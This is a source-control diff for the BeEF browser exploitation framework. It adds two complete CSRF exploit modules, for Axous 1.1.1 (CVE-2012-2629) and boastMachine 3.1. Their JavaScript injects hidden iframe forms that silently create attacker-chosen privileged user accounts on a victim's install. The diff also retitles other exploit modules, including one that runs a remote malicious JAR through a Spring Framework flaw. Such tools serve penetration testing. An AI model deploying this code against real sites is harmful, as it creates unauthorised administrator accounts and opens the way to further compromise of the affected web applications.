Added a couple of CSRF modules:

o ./modules/exploits/boastmachine_3_1_add_user_csrf/
	o ./modules/exploits/axous_1_1_1_add_user_csrf/

Updated a few exploit titles

modules/exploits/axous_1_1_1_add_user_csrf/command.js

@@ -0,0 +1,40 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+	var base     = '<%= @base %>'; 
+	var username = '<%= @username %>';
+	var password = '<%= @password %>';
+	var email    = '<%= @email %>';
+
+	var axous_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+		{'type':'hidden', 'name':'user_name',   'value':username},
+		{'type':'hidden', 'name':'new_passwd',  'value':password},
+		{'type':'hidden', 'name':'new_passwd1', 'value':password},
+		{'type':'hidden', 'name':'email',       'value':email},
+		{'type':'hidden', 'name':'dosubmit',    'value':'1'} ,
+		{'type':'hidden', 'name':'id',          'value':''},
+		{'type':'hidden', 'name':'action',      'value':'addnew'} ,
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(axous_iframe);
+	}
+	setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/axous_1_1_1_add_user_csrf/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        axous_add_user_csrf:
+            enable: true
+            category: "Exploits"
+            name: "Axous <= 1.1.1 Add User CSRF"
+            description: "Attempts to add a user to an Axous <= 1.1.1 install (CVE-2012-2629)."
+            authors: ["bcoles", "Ivano Binetti"]
+            target:
+                working: ["ALL"]

modules/exploits/axous_1_1_1_add_user_csrf/module.rb

@@ -0,0 +1,31 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Axous_add_user_csrf < BeEF::Core::Command
+
+	def self.options
+		return [
+			{ 'name' => 'base', 'ui_label' => 'Axous URL', 'value' => 'http://target/admin/administrators_add.php'},
+			{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
+			{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
+			{ 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/boastmachine_3_1_add_user_csrf/command.js

@@ -0,0 +1,41 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+	var base     = '<%= @base %>'; 
+	var username = '<%= @username %>';
+	var password = '<%= @password %>';
+	var email    = '<%= @email %>';
+
+	var boastmachine_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+		{'type':'hidden', 'name':'action',     'value':'add_user'},
+		{'type':'hidden', 'name':'do',         'value':'add'},
+		{'type':'hidden', 'name':'user_login', 'value':username},
+		{'type':'hidden', 'name':'user_pass',  'value':password},
+		{'type':'hidden', 'name':'user_name',  'value':username},
+		{'type':'hidden', 'name':'user_email', 'value':email},
+		{'type':'hidden', 'name':'blogs[]',    'value':'4'},
+		{'type':'hidden', 'name':'user_level', 'value':'4'},
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(boastmachine_iframe);
+	}
+	setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        boastmachine_add_user_csrf:
+            enable: true
+            category: "Exploits"
+            name: "boastMachine <= 3.1 Add User CSRF"
+            description: "Attempts to add a user to a boastMachine <= 3.1 install."
+            authors: ["bcoles", "Dr.NaNo"]
+            target:
+                working: ["ALL"]

modules/exploits/boastmachine_3_1_add_user_csrf/module.rb

@@ -0,0 +1,31 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Boastmachine_add_user_csrf < BeEF::Core::Command
+
+	def self.options
+		return [
+			{ 'name' => 'base', 'ui_label' => 'boastMachine URL', 'value' => 'http://target/bmc/admin.php?action=add_user&blog'},
+			{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
+			{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
+			{ 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/spring_framework_malicious_jar/config.yaml

@@ -18,7 +18,7 @@ beef:
         spring_framework_malicious_jar:
             enable: true
             category: "Exploits"
-            name: "Spring Framework Malicious Jar"
+            name: "Spring Framework Malicious Jar Exploit"
             description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).<br/>Specify the URL for a form controller on the target and the URL for your malicious JAR file.<br/>For more information see: http://www.exploit-db.com/exploits/13918/<br/><br/>Versions Affected:<br/>3.0.0 to 3.0.2<br/>2.5.0 to 2.5.6.SEC01 (community releases)<br/>2.5.0 to 2.5.7 (subscription customers)"
             authors: ["bcoles"]
             target:

modules/exploits/zenoss_add_user_csrf/config.yaml

@@ -18,7 +18,7 @@ beef:
         zenoss_add_user_csrf:
             enable: true
             category: "Exploits"
-            name: "Zenoss Add User CSRF"
+            name: "Zenoss <= 3.2.1 Add User CSRF"
             description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server."
             authors: ["bcoles"]
             target:

modules/exploits/zenoss_daemon_csrf/config.yaml

@@ -18,7 +18,7 @@ beef:
         zenoss_daemon_csrf:
             enable: true
             category: "Exploits"
-            name: "Zenoss Daemon CSRF"
+            name: "Zenoss <= 3.2.1 Daemon CSRF"
             description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server."
             authors: ["bcoles"]
             target: